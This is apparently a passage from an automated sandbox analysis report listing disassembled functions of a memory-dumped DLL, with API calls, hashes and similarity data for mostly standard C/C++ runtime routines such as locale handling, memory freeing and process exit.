      • Part of subcall function 6E20FA06: SetLastError.KERNEL32(00000000,00000000,?,?,0000001C), ref: 6E20FA7E
      • Part of subcall function 6E20FA06: _abort.LIBCMT ref: 6E20FA84
      • Part of subcall function 6E20FA06: _free.LIBCMT ref: 6E20FA65
      • Part of subcall function 6E20FA06: SetLastError.KERNEL32(00000000,00000000,?,?,0000001C), ref: 6E20FA72
    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E21CE0F
    • IsValidCodePage.KERNEL32(00000000), ref: 6E21CE6A
    • IsValidLocale.KERNEL32(?,00000001), ref: 6E21CE79
    • GetLocaleInfoW.KERNEL32(?,00001001,6E21196E,00000040,?,6E211A8E,00000055,00000000,?,?,00000055,00000000), ref: 6E21CEC1
    • GetLocaleInfoW.KERNEL32(?,00001002,6E2119EE,00000040), ref: 6E21CEE0
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
    • String ID:
    • API String ID: 745075371-0
    • Opcode ID: 1b9624eacbbededf87aef5f85cb0d4df81c26725fd4715e14be041f003f6866f
    • Instruction ID: b61778b1c638a03508d607e9528fc3b4f452c8531b74c3039a0d989e004d8fab
    • Opcode Fuzzy Hash: 1b9624eacbbededf87aef5f85cb0d4df81c26725fd4715e14be041f003f6866f
    • Instruction Fuzzy Hash: 6B517379A0820F9BEB08DBE5CC46AEA77FAAF05B01F040475EA14EF140E7709B44CB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20875F, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
    Download Yara Rule
    APIs
    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6E208857
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6E208861
    • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 6E20886E
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: ExceptionFilterUnhandled$DebuggerPresent
    • String ID:
    • API String ID: 3906539128-0
    • Opcode ID: 026391b987dd7a6fb9cb3f08c8167f4484c44c2803c2afd385cfd21b6a2650bf
    • Instruction ID: c939a214ef64643f673bd6a308f76f312ce4a01a18bacd414322e490cb1661b9
    • Opcode Fuzzy Hash: 026391b987dd7a6fb9cb3f08c8167f4484c44c2803c2afd385cfd21b6a2650bf
    • Instruction Fuzzy Hash: 7131E87490122DDBCB61DF64D988BCDBBB9BF08310F5045EAE81CA7290EB709B858F54
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D1E8A, Relevance: 4.5, APIs: 3, Instructions: 23COMMON
    Download Yara Rule
    C-Code - Quality: 58%
    			E6E1D1E8A(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}





    0x6e1d1e8e
    0x6e1d1e9f
    0x6e1d1ea7
    0x6e1d1ea9
    0x6e1d1ebc
    0x6e1d1ebc
    0x6e1d1ec6

    APIs
    • GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,6E1D1B27,?,6E1D1CE6,?,00000000,00000000,?,?,?,6E1D1CE6), ref: 6E1D1E9F
    • GetSystemDefaultUILanguage.KERNEL32(?,?,6E1D1B27,?,6E1D1CE6,?,00000000,00000000,?,?,?,6E1D1CE6), ref: 6E1D1EA9
    • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6E1D1B27,?,6E1D1CE6,?,00000000,00000000,?,?,?,6E1D1CE6), ref: 6E1D1EBC
    Memory Dump Source
    • Source File: 00000003.00000002.613044435.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000003.00000002.613025498.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613065340.000000006E1D3000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613101446.000000006E1D5000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.613130163.000000006E1D6000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Language$DefaultInfoLocaleNameSystem
    • String ID:
    • API String ID: 3724080410-0
    • Opcode ID: 2f34523d4bde47952dfd65c3705819efcfeef975ce82e79f593a4ba7485fe90b
    • Instruction ID: d1d5b5e6585c51ad58a163c72204e0ac6790de3adfa3610b23e1d41e57e95674
    • Opcode Fuzzy Hash: 2f34523d4bde47952dfd65c3705819efcfeef975ce82e79f593a4ba7485fe90b
    • Instruction Fuzzy Hash: B2E04FB8640208F6EB00E7E19D0AFBE72BCAB0070AF504084FB01E60C0D7B49A09B769
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20DF99, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
    Download Yara Rule
    APIs
    • GetCurrentProcess.KERNEL32(?,?,6E20DF6F,?,6E2494E8,0000000C,6E20E0B7,?,00000002,00000000), ref: 6E20DFBA
    • TerminateProcess.KERNEL32(00000000,?,6E20DF6F,?,6E2494E8,0000000C,6E20E0B7,?,00000002,00000000), ref: 6E20DFC1
    • ExitProcess.KERNEL32 ref: 6E20DFD3
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: Process$CurrentExitTerminate
    • String ID:
    • API String ID: 1703294689-0
    • Opcode ID: 269ada3918c682a27aa23769e96fa7c8c162019b179d3cc09d14fe1625104d53
    • Instruction ID: d3409f91e872bed2aeeba18efd44fa7ccdd9d0123b1fb8a5a1848d90c49f1fb7
    • Opcode Fuzzy Hash: 269ada3918c682a27aa23769e96fa7c8c162019b179d3cc09d14fe1625104d53
    • Instruction Fuzzy Hash: 46E04F3101054CAFCF016F90CA0CE883B7BFB05289F005814FD058B160CB76DA92DE50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21C68E, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6E20FA06: GetLastError.KERNEL32(0000001C,00000000,6E209156,00000000,00000000,?,6E2127FC,00000000,00000000,?,?,0000001C), ref: 6E20FA0A
      • Part of subcall function 6E20FA06: _free.LIBCMT ref: 6E20FA3D
      • Part of subcall function 6E20FA06: SetLastError.KERNEL32(00000000,00000000,?,?,0000001C), ref: 6E20FA7E
      • Part of subcall function 6E20FA06: _abort.LIBCMT ref: 6E20FA84
    • EnumSystemLocalesW.KERNEL32(6E21C7B6,00000001,00000000,?,6E21196E,?,6E21CDE3,00000000,?,?,?), ref: 6E21C700
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: ErrorLast$EnumLocalesSystem_abort_free
    • String ID:
    • API String ID: 1084509184-0
    • Opcode ID: 86c77a7521550ae6ddf28b698250c094a97e28729ef4be24fcbf5546a076a9c2
    • Instruction ID: 0f51ae3c3d769e6e8ca0c4e34e86e5199fac62e79d2c79aaaab0b539b41ced2a
    • Opcode Fuzzy Hash: 86c77a7521550ae6ddf28b698250c094a97e28729ef4be24fcbf5546a076a9c2
    • Instruction Fuzzy Hash: B011363E2083094FDB1C9F78C8926AAB7E2FF80769B18443CD6868BB00D371A942C740
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21C729, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6E20FA06: GetLastError.KERNEL32(0000001C,00000000,6E209156,00000000,00000000,?,6E2127FC,00000000,00000000,?,?,0000001C), ref: 6E20FA0A
      • Part of subcall function 6E20FA06: _free.LIBCMT ref: 6E20FA3D
      • Part of subcall function 6E20FA06: SetLastError.KERNEL32(00000000,00000000,?,?,0000001C), ref: 6E20FA7E
      • Part of subcall function 6E20FA06: _abort.LIBCMT ref: 6E20FA84
    • EnumSystemLocalesW.KERNEL32(6E21CA06,00000001,?,?,6E21196E,?,6E21CDA7,6E21196E,?,?,?,?,?,6E21196E,?,?), ref: 6E21C775
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: ErrorLast$EnumLocalesSystem_abort_free
    • String ID:
    • API String ID: 1084509184-0
    • Opcode ID: ed90f634875fb4b646f34d6486581b3ee8e1d04f0d93bdd9eabab97cf3f1e623
    • Instruction ID: a7e0c584f9858c473db5fb6a501e26809a289817e4a8a45b50ca7c80123d6030
    • Opcode Fuzzy Hash: ed90f634875fb4b646f34d6486581b3ee8e1d04f0d93bdd9eabab97cf3f1e623
    • Instruction Fuzzy Hash: D5F04C3E2083095FD7085FB98882ABA7BDAEF80B6CB14443CEB058F640D7B19942C740
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E213961, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
    Download Yara Rule
    APIs
    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,6E21142E,?,00000004), ref: 6E2139B4
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: InfoLocale
    • String ID:
    • API String ID: 2299586839-0
    • Opcode ID: 791c9e3e8cf18408d3ef8a8006ba844ba8c9630b5056575f198fa59f42500906
    • Instruction ID: 1e66b9cb8a6ed9e291cc9f738f2a415662bda79daa78fe0b4d54df4c9f0d88ee
    • Opcode Fuzzy Hash: 791c9e3e8cf18408d3ef8a8006ba844ba8c9630b5056575f198fa59f42500906
    • Instruction Fuzzy Hash: CEF06D7550420CBBCF059FA4CD09EEE7BABFB15711F010455FD096A250DA329A14DAA6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E2134FA, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6E20B46C: RtlEnterCriticalSection.NTDLL(-6E2E2E05), ref: 6E20B47B
    • EnumSystemLocalesW.KERNEL32(6E2134B4,00000001,6E249690,0000000C), ref: 6E213532
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: CriticalEnterEnumLocalesSectionSystem
    • String ID:
    • API String ID: 1272433827-0
    • Opcode ID: df0b76e6a1199371649cdde7f9d1642ae7638d5474de8427e767c2cd390a8deb
    • Instruction ID: 900655d74f877523a7011c2be22cd967a9a276102c5e32ef6c2a860c28bd3ac5
    • Opcode Fuzzy Hash: df0b76e6a1199371649cdde7f9d1642ae7638d5474de8427e767c2cd390a8deb
    • Instruction Fuzzy Hash: F3F0497A910618EFDB14EFB8C549B9D37E2FB06B25F008559E401DB2E0CB348A84CB51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21C643, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6E20FA06: GetLastError.KERNEL32(0000001C,00000000,6E209156,00000000,00000000,?,6E2127FC,00000000,00000000,?,?,0000001C), ref: 6E20FA0A
      • Part of subcall function 6E20FA06: _free.LIBCMT ref: 6E20FA3D
      • Part of subcall function 6E20FA06: SetLastError.KERNEL32(00000000,00000000,?,?,0000001C), ref: 6E20FA7E
      • Part of subcall function 6E20FA06: _abort.LIBCMT ref: 6E20FA84
    • EnumSystemLocalesW.KERNEL32(6E21C59A,00000001,?,?,?,6E21CE05,6E21196E,?,?,?,?,?,6E21196E,?,?,?), ref: 6E21C67A
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: ErrorLast$EnumLocalesSystem_abort_free
    • String ID:
    • API String ID: 1084509184-0
    • Opcode ID: db87c0b0c52b470edde049f6b190f0d427ee1adb82e9550f11d47123e13628bf
    • Instruction ID: 1491386b6729325a2f2550a52dde4608b2f9a14c44c6d100a0324a637b8f271b
    • Opcode Fuzzy Hash: db87c0b0c52b470edde049f6b190f0d427ee1adb82e9550f11d47123e13628bf
    • Instruction Fuzzy Hash: B1F05C3D30424957CB089F75C81679A7F95EFC1B54B0B4068EB058F240C2319943C790
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E24D3EC, Relevance: .1, Instructions: 75COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000003.00000002.613459310.000000006E24D000.00000040.00020000.sdmp, Offset: 6E24D000, based on PE: false
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
    • Instruction ID: ae26e18ea6742a2cdea608948165fec8102435e88a55f08f1f70cf88b19cc2e5
    • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
    • Instruction Fuzzy Hash: 61119677340109DFD754CE99EC91E9673EBEB892707198165ED04CB302DA75E841CB60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E24D7E5, Relevance: .1, Instructions: 55COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000003.00000002.613459310.000000006E24D000.00000040.00020000.sdmp, Offset: 6E24D000, based on PE: false
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
    • Instruction ID: 4cf5346ffa0709a913574e654e6ca035b8020b5639871e0456d37403fc26b2fb
    • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
    • Instruction Fuzzy Hash: 6901C43235424ECFD74DCB99E894E79B7E6EBC2325B15C07EC44687616D230E846CD50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21979C, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
    Download Yara Rule
    APIs
    • ___free_lconv_mon.LIBCMT ref: 6E2197E0
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21AFAD
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21AFBF
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21AFD1
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21AFE3
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21AFF5
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21B007
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21B019
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21B02B
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21B03D
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21B04F
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21B061
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21B073
      • Part of subcall function 6E21AF90: _free.LIBCMT ref: 6E21B085
    • _free.LIBCMT ref: 6E2197D5
      • Part of subcall function 6E20FBB2: HeapFree.KERNEL32(00000000,00000000,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4), ref: 6E20FBC8
      • Part of subcall function 6E20FBB2: GetLastError.KERNEL32(6E1F73C4,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4,6E1F73C4), ref: 6E20FBDA
    • _free.LIBCMT ref: 6E2197F7
    • _free.LIBCMT ref: 6E21980C
    • _free.LIBCMT ref: 6E219817
    • _free.LIBCMT ref: 6E219839
    • _free.LIBCMT ref: 6E21984C
    • _free.LIBCMT ref: 6E21985A
    • _free.LIBCMT ref: 6E219865
    • _free.LIBCMT ref: 6E21989D
    • _free.LIBCMT ref: 6E2198A4
    • _free.LIBCMT ref: 6E2198C1
    • _free.LIBCMT ref: 6E2198D9
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: 95f88ae175ae0597ed2c29667f67ecf44a5f7799016ea6fb17450b64d23a88c9
    • Instruction ID: 39eafc4afae1f6375e3965c4e19f1a7da22d1737117fab2d62eb2a2cd0e60b99
    • Opcode Fuzzy Hash: 95f88ae175ae0597ed2c29667f67ecf44a5f7799016ea6fb17450b64d23a88c9
    • Instruction Fuzzy Hash: 7731923250830E9FEB618EB8D850BD6B3FEEF04315F218869E559D7190DF71AA90CB24
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E202171, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
    Download Yara Rule
    APIs
    • __EH_prolog3.LIBCMT ref: 6E202178
    • std::_Lockit::_Lockit.LIBCPMT ref: 6E202182
    • int.LIBCPMTD ref: 6E202199
      • Part of subcall function 6E1FB050: std::_Lockit::_Lockit.LIBCPMT ref: 6E1FB066
      • Part of subcall function 6E1FB050: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1FB090
    • codecvt.LIBCPMT ref: 6E2021BC
    • std::_Facet_Register.LIBCPMT ref: 6E2021D3
    • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2021F3
    • std::bad_alloc::bad_alloc.LIBCMTD ref: 6E202203
    • __CxxThrowException@8.LIBVCRUNTIME ref: 6E202211
    • __EH_prolog3.LIBCMT ref: 6E20221E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Exception@8Facet_RegisterThrowcodecvtstd::bad_alloc::bad_alloc
    • String ID: H..n
    • API String ID: 300551499-3963257175
    • Opcode ID: 666cfff694f88270407b2550ea862cc175aafe3584da1b3d53a55c55b710a228
    • Instruction ID: cde629677b12f541ef071d75b7274b372b1683a5f21722539af6de7aca2d3718
    • Opcode Fuzzy Hash: 666cfff694f88270407b2550ea862cc175aafe3584da1b3d53a55c55b710a228
    • Instruction Fuzzy Hash: AD319CB690022E8FCB01CFD4C854BEDB7BBBF48318F144809E4146B2D1CB75AA45CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E2141B8, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
    Download Yara Rule
    APIs
    • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,6E21492D,?,?,?,?,?,?), ref: 6E2141FA
    • __fassign.LIBCMT ref: 6E214275
    • __fassign.LIBCMT ref: 6E214290
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6E2142B6
    • WriteFile.KERNEL32(?,?,00000000,-I!n,00000000,?,?,?,?,?,?,?,?,?,6E21492D,?), ref: 6E2142D5
    • WriteFile.KERNEL32(?,?,00000001,-I!n,00000000,?,?,?,?,?,?,?,?,?,6E21492D,?), ref: 6E21430E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
    • String ID: -I!n
    • API String ID: 1324828854-717375244
    • Opcode ID: 4d7db087e2e0a857935064258c624a9b53375e92a62bc50653c8e8b8a0bc1d00
    • Instruction ID: ff095e861d1f8bbf349be6699026ad8797813f753c3cf54385aa038ba4490dd9
    • Opcode Fuzzy Hash: 4d7db087e2e0a857935064258c624a9b53375e92a62bc50653c8e8b8a0bc1d00
    • Instruction Fuzzy Hash: 2D51D37090424A9FDF10CFE8C855ADEBBFAFF09304F14415AEA69E7241D7309A45CB61
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1F9750, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 85COMMON
    Download Yara Rule
    APIs
    • std::_Lockit::_Lockit.LIBCPMT ref: 6E1F977A
    • int.LIBCPMTD ref: 6E1F9793
      • Part of subcall function 6E1FB050: std::_Lockit::_Lockit.LIBCPMT ref: 6E1FB066
      • Part of subcall function 6E1FB050: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1FB090
    • ctype.LIBCPMTD ref: 6E1F97CA
    • std::bad_alloc::bad_alloc.LIBCMTD ref: 6E1F97DA
    • __CxxThrowException@8.LIBVCRUNTIME ref: 6E1F97E8
    • std::_Lockit::~_Lockit.LIBCPMT ref: 6E1F9851
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Exception@8Throwctypestd::bad_alloc::bad_alloc
    • String ID: x-.n
    • API String ID: 1618461562-509069231
    • Opcode ID: 0e97f7c3da1aa3df4a7e4ab17d04754fc20158179c34df925bed72cc8f80c6f7
    • Instruction ID: 6201ce547f3a28b0df48f6435c6568d3029dfa78574812aba542f36c434b655d
    • Opcode Fuzzy Hash: 0e97f7c3da1aa3df4a7e4ab17d04754fc20158179c34df925bed72cc8f80c6f7
    • Instruction Fuzzy Hash: 4B310AB5D0020DDFCB04DFD8C991AEEBBB5BF58314F204A19E515A7280DB346A85DBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1F9870, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 85COMMON
    Download Yara Rule
    APIs
    • std::_Lockit::_Lockit.LIBCPMT ref: 6E1F989A
    • int.LIBCPMTD ref: 6E1F98B3
      • Part of subcall function 6E1FB050: std::_Lockit::_Lockit.LIBCPMT ref: 6E1FB066
      • Part of subcall function 6E1FB050: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1FB090
    • messages.LIBCPMTD ref: 6E1F98EA
    • std::bad_alloc::bad_alloc.LIBCMTD ref: 6E1F98FA
    • __CxxThrowException@8.LIBVCRUNTIME ref: 6E1F9908
    • std::_Lockit::~_Lockit.LIBCPMT ref: 6E1F9971
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Exception@8Throwmessagesstd::bad_alloc::bad_alloc
    • String ID: x,.n
    • API String ID: 2603189070-529903000
    • Opcode ID: 656e3878b22a59369ba312113df480f92593aad876cbaf22d2761e8e575b1703
    • Instruction ID: 38f2ddcb1fee2187a938e78b5680864228973b8b6be9895bfe42b38a7f5895fb
    • Opcode Fuzzy Hash: 656e3878b22a59369ba312113df480f92593aad876cbaf22d2761e8e575b1703
    • Instruction Fuzzy Hash: A2310AB5D0420DDFCB04DFE4C991AEEB7B5BB48314F204A19E526A7280DB346A85DBE1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1F9990, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 85COMMON
    Download Yara Rule
    APIs
    • std::_Lockit::_Lockit.LIBCPMT ref: 6E1F99BA
    • int.LIBCPMTD ref: 6E1F99D3
      • Part of subcall function 6E1FB050: std::_Lockit::_Lockit.LIBCPMT ref: 6E1FB066
      • Part of subcall function 6E1FB050: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1FB090
    • numpunct.LIBCPMTD ref: 6E1F9A0A
    • std::bad_alloc::bad_alloc.LIBCMTD ref: 6E1F9A1A
    • __CxxThrowException@8.LIBVCRUNTIME ref: 6E1F9A28
    • std::_Lockit::~_Lockit.LIBCPMT ref: 6E1F9A91
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Exception@8Thrownumpunctstd::bad_alloc::bad_alloc
    • String ID: |,.n
    • API String ID: 2683378708-2432121551
    • Opcode ID: 16bd551d1f1b9e7e11c08fe8c6c701f92f81132ff17ddf669766cc77996ef073
    • Instruction ID: 3f970dd14d6e8baf848fe53dfd8ef84ba07923c8c1ae912e3eb3ab8880d255fa
    • Opcode Fuzzy Hash: 16bd551d1f1b9e7e11c08fe8c6c701f92f81132ff17ddf669766cc77996ef073
    • Instruction Fuzzy Hash: 633108B5D00209DFCB04DFE4C991AEEBBB5FF58314F204A19E415A7280DB346A85DBE1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21538F, Relevance: 13.8, APIs: 9, Instructions: 300COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 5d73f8c56a271966bfc4eb911f49aa939c77355cabec26f39df61e565fc1e485
    • Instruction ID: e613b24d1be5e7f875f7a83f9408a302cd4715c75c6972866c4573d143765a9e
    • Opcode Fuzzy Hash: 5d73f8c56a271966bfc4eb911f49aa939c77355cabec26f39df61e565fc1e485
    • Instruction Fuzzy Hash: FFC1BF7498828EAFDB118FE8C855BDDBBF6BF0A311F0400C5DA50A7395C7749A41CB60
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1FE050, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 400COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: std::ios_base::getloc$Mpunctctypestd::ios_base::width
    • String ID: @
    • API String ID: 2441703863-2766056989
    • Opcode ID: c0976de46fa56f14d3e7ae88b00c59e4861c71e99fff0cd3e96b0e03ac1ae0c4
    • Instruction ID: b0ee97cdc12a571e27bda8c7488c37ccb62aa156a08ca2197c67e976292d9537
    • Opcode Fuzzy Hash: c0976de46fa56f14d3e7ae88b00c59e4861c71e99fff0cd3e96b0e03ac1ae0c4
    • Instruction Fuzzy Hash: 60022CB1900248DFDB04CFD8C990BDEBBF9BF48304F148559E519AB295D734AA86DF90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1FECE0, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 352COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: std::ios_base::getloc$Mpunctctypestd::ios_base::width
    • String ID: @
    • API String ID: 2441703863-2766056989
    • Opcode ID: e567caef25a7c5718150d4f448b09bb918b2c9278897d537a3978982363272d7
    • Instruction ID: 1ef3af5e38f6e963066dd5a6b986f2000e2626e248f7cb8d10b65a8e6e20900d
    • Opcode Fuzzy Hash: e567caef25a7c5718150d4f448b09bb918b2c9278897d537a3978982363272d7
    • Instruction Fuzzy Hash: BCE11BB1900248DFDB04CFD8C990AEEBBF9BF48304F144659E519AB295D734AE82DF90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21B988, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6E21B6CF: _free.LIBCMT ref: 6E21B6F8
    • _free.LIBCMT ref: 6E21B9D6
      • Part of subcall function 6E20FBB2: HeapFree.KERNEL32(00000000,00000000,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4), ref: 6E20FBC8
      • Part of subcall function 6E20FBB2: GetLastError.KERNEL32(6E1F73C4,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4,6E1F73C4), ref: 6E20FBDA
    • _free.LIBCMT ref: 6E21B9E1
    • _free.LIBCMT ref: 6E21B9EC
    • _free.LIBCMT ref: 6E21BA40
    • _free.LIBCMT ref: 6E21BA4B
    • _free.LIBCMT ref: 6E21BA56
    • _free.LIBCMT ref: 6E21BA61
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 8150f2849fa73c3c1386e614bce17a8c7f263fcc3cf36198d2fcf3c8acff8a63
    • Instruction ID: c6c774969321fb0b61d57012a1faad262c914112f341ade4dd921d3badc6bec4
    • Opcode Fuzzy Hash: 8150f2849fa73c3c1386e614bce17a8c7f263fcc3cf36198d2fcf3c8acff8a63
    • Instruction Fuzzy Hash: EF116D76545B4CEBEA31AFF0CC05FCB77FE5F04745F408C14A39A662A4DB64A6484A50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E215D99, Relevance: 9.2, APIs: 6, Instructions: 216COMMON
    Download Yara Rule
    APIs
    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6E209ACC,6E209ACC,?,?,?,6E215FEA,00000001,00000001,82E85006), ref: 6E215DF3
    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E215FEA,00000001,00000001,82E85006,?,?,?), ref: 6E215E79
